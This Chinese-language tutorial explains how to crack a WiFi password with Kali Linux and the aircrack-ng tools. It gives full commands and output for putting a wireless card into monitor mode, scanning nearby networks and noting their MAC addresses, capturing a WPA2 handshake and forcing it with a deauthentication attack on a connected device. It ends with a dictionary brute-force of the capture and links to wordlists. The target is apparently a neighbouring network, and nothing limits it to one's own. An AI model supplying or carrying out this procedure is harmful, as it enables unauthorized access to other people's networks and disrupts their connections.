如何破解wifi密码?
前期准备:
kali 系统
外置无线网卡
破解过程:
首先,需要登录kali系统,可以是虚拟机。
在虚拟机中设置点击 虚拟机-可移动设备-无线网卡的名称,将无线网卡绑定到kali虚拟机上。
在kali中切换到root账户:sudo su root
使用命令:ifconfig 查看无线网卡是否正常接入:一般会回显wlan0,记住这个wlan0 网卡名称
┌──(kali㉿kali)-[~/Desktop] └─$ ifconfig eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 ether 00:0c:29:4f:04:de txqueuelen 1000 (Ethernet) RX packets 5401114 bytes 708741419 (675.9 MiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 4868778 bytes 457372067 (436.1 MiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 inet6 ::1 prefixlen 128 scopeid 0x10<host> loop txqueuelen 1000 (Local Loopback) RX packets 37851 bytes 14126452 (13.4 MiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 37851 bytes 14126452 (13.4 MiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 wlan0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500 ether 06:8a:73:6a:51:48 txqueuelen 1000 (Ethernet) RX packets 0 bytes 0 (0.0 B) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 0 bytes 0 (0.0 B) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
使用命令:airmon-ng 查看网卡是否支持监听功能:有回显说明支持监听功能。
┌──(root💀kali)-[/home/kali/Desktop] └─# airmon-ng PHY Interface Driver Chipset phy4 wlan0 rt2800usb Ralink Technology, Corp. RT2870/RT3070
使用命令:airmon-ng start wlan0 激活无线网卡的监听模式
┌──(root💀kali)-[/home/kali/Desktop] └─# airmon-ng start wlan0 Found 2 processes that could cause trouble. Kill them using 'airmon-ng check kill' before putting the card in monitor mode, they will interfere by changing channels and sometimes putting the interface back in managed mode PID Name 531 NetworkManager 969681 wpa_supplicant PHY Interface Driver Chipset phy4 wlan0 rt2800usb Ralink Technology, Corp. RT2870/RT3070 (mac80211 monitor mode vif enabled for [phy4]wlan0 on [phy4]wlan0mon) (mac80211 station mode vif disabled for [phy4]wlan0)
返回enabled说明已经激活,这时使用ifconfig命令再次查看无线网卡,可能会发现无线网卡名称变为wlan0mon
┌──(root💀kali)-[/home/kali/Desktop] └─# ifconfig eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 ether 00:0c:29:4f:04:de txqueuelen 1000 (Ethernet) RX packets 5401114 bytes 708741419 (675.9 MiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 4868778 bytes 457372067 (436.1 MiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 inet6 ::1 prefixlen 128 scopeid 0x10<host> loop txqueuelen 1000 (Local Loopback) RX packets 37851 bytes 14126452 (13.4 MiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 37851 bytes 14126452 (13.4 MiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 wlan0mon: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 unspec C8-3A-35-CE-82-22-00-8C-00-00-00-00-00-00-00-00 txqueuelen 1000 (UNSPEC) RX packets 0 bytes 0 (0.0 B) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 0 bytes 0 (0.0 B) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
使用命令:airodump-ng wlan0mon 扫描当前周边环境的WiFi信号,这里的wlan0mon是当前无线网卡的网卡名称,具体名称需要自行更换。如何扫不出来,请插拔一下无线网卡,再次使用命
令:airmon-ng start wlan0以及airodump-ng wlan0mon。
CH 5 ][ Elapsed: 6 s ][ 2023-01-20 21:23 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 5A:41:20:A3:5E:D9 -70 2 0 0 1 540 WPA2 CCMP PSK <length: 0> 74:85:C4:5A:8E:2D -56 2 0 0 6 270 WPA2 CCMP PSK scivous D6:B7:09:B2:D5:4E -65 4 0 0 3 360 WPA2 CCMP PSK <length: 0> 50:78:B3:61:04:60 -67 2 0 0 4 130 WPA2 CCMP PSK ChinaNet-x5cZ 48:73:97:01:2C:46 -64 2 0 0 9 130 OPN <length: 0> C8:6C:20:46:E6:AC -72 2 0 0 4 130 WPA2 CCMP PSK ChinaNet-5Zzh 48:73:97:01:2C:47 -73 2 0 0 9 130 WPA2 CCMP PSK ChinaNet-2.4G-2C45 F0:55:01:F3:EF:75 -75 2 0 0 11 360 WPA2 CCMP PSK ChinaNet-G64JFP_Wi-Fi5 BSSID STATION PWR Rate Lost Frames Notes Probes (not associated) 34:EA:34:9C:A1:F9 -74 0 - 1 15 2 ChinaNet-q97E C8:3A:35:06:11:08 16:1E:8A:6F:A0:15 -1 11e- 0 0 3 Quitting...
找到需要破解的wifi名称ESSID这一栏:比如scivous,记录这个mac地址(74:85:C4:5A:8E:2D)以及CH号(6)。CH表示无线网络信道,BSSID表示无线 AP 的硬件地址。
找到之后,即可CRTL+D结束运行。
下面开始抓包:
使用命令:airodump-ng -c 6 --bssid 74:85:C4:5A:8E:2D -w /home/kali/Desktop/data wlan0mon
这里的6是指CH号,bssid是指bssid号,-w后面写入要保存的文件地址以及对应的文件名称,wlan0mon是指网卡名称。
CH 6 ][ Elapsed: 6 s ][ 2023-01-20 21:41 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 74:85:C4:5A:8E:2D -66 38 48 85 15 6 270 WPA2 CCMP PSK H3C_1703 BSSID STATION PWR Rate Lost Frames Notes Probes 74:85:C4:5A:8E:2D E4:93:6A:CB:87:39 -46 0 - 1e 1114 22 74:85:C4:5A:8E:2D 64:61:40:F4:47:6D -48 1e- 1e 1430 74
出现这个界面,说明已经开始抓包了。如果没有出现,继续插拔无线网卡,按照之前的操作在来一遍。
抓包过程可能比较慢,这时可以进行ack攻击,加快抓包进程,这时不要关闭抓包,打开新的terminal,使用命令:
aireplay-ng -0 10 -a 74:85:C4:5A:8E:2D -c E4:93:6A:CB:87:39 wlan0mon
这里的10代表攻击10次,-a为bssid号,-c为station号(用户硬件设备地址)。
┌──(kali㉿kali)-[~/Desktop] └─$ sudo aireplay-ng -0 10 -a 74:85:C4:5A:8E:2D -c E4:93:6A:CB:87:39 wlan0mon 1 ⨯ [sudo] password for kali: 21:50:17 Waiting for beacon frame (BSSID: 74:85:C4:5A:8E:2D) on channel 6 21:50:18 Sending 64 directed DeAuth (code 7). STMAC: [E4:93:6A:CB:87:39] [24|49 ACKs] 21:50:18 Sending 64 directed DeAuth (code 7). STMAC: [E4:93:6A:CB:87:39] [47|31 ACKs] 21:50:19 Sending 64 directed DeAuth (code 7). STMAC: [E4:93:6A:CB:87:39] [11|40 ACKs] 21:50:20 Sending 64 directed DeAuth (code 7). STMAC: [E4:93:6A:CB:87:39] [ 8|45 ACKs] 21:50:20 Sending 64 directed DeAuth (code 7). STMAC: [E4:93:6A:CB:87:39] [ 5|38 ACKs]
查看抓包界面, CH 6 ][ Elapsed: 6 s ][ 2023-01-20 21:41后面是否出现][ WPA handshake: 74:85:C4:5A:8E:2D,这时,就代表已经抓到了包,在相应的位置会新生成5个文件,找到cap结尾的
文件:
暴力破解:
使用wifi字典对data-01.cap进行hash暴力破解:这里的破解可以离线破解了,不需要联网。
使用命令:aircrack-ng -w /home/kali/Desktop/password.txt -b 74:85:C4:5A:8E:2D /home/kali/Desktop/data-01.cap
字典文件可以参考:https://github.com/conwnet/wpa-dictionary,https://www.freedidi.com/2503.html,也可以自己自行收集。
破解成功之后,使用相应的密码,登录wifi即可。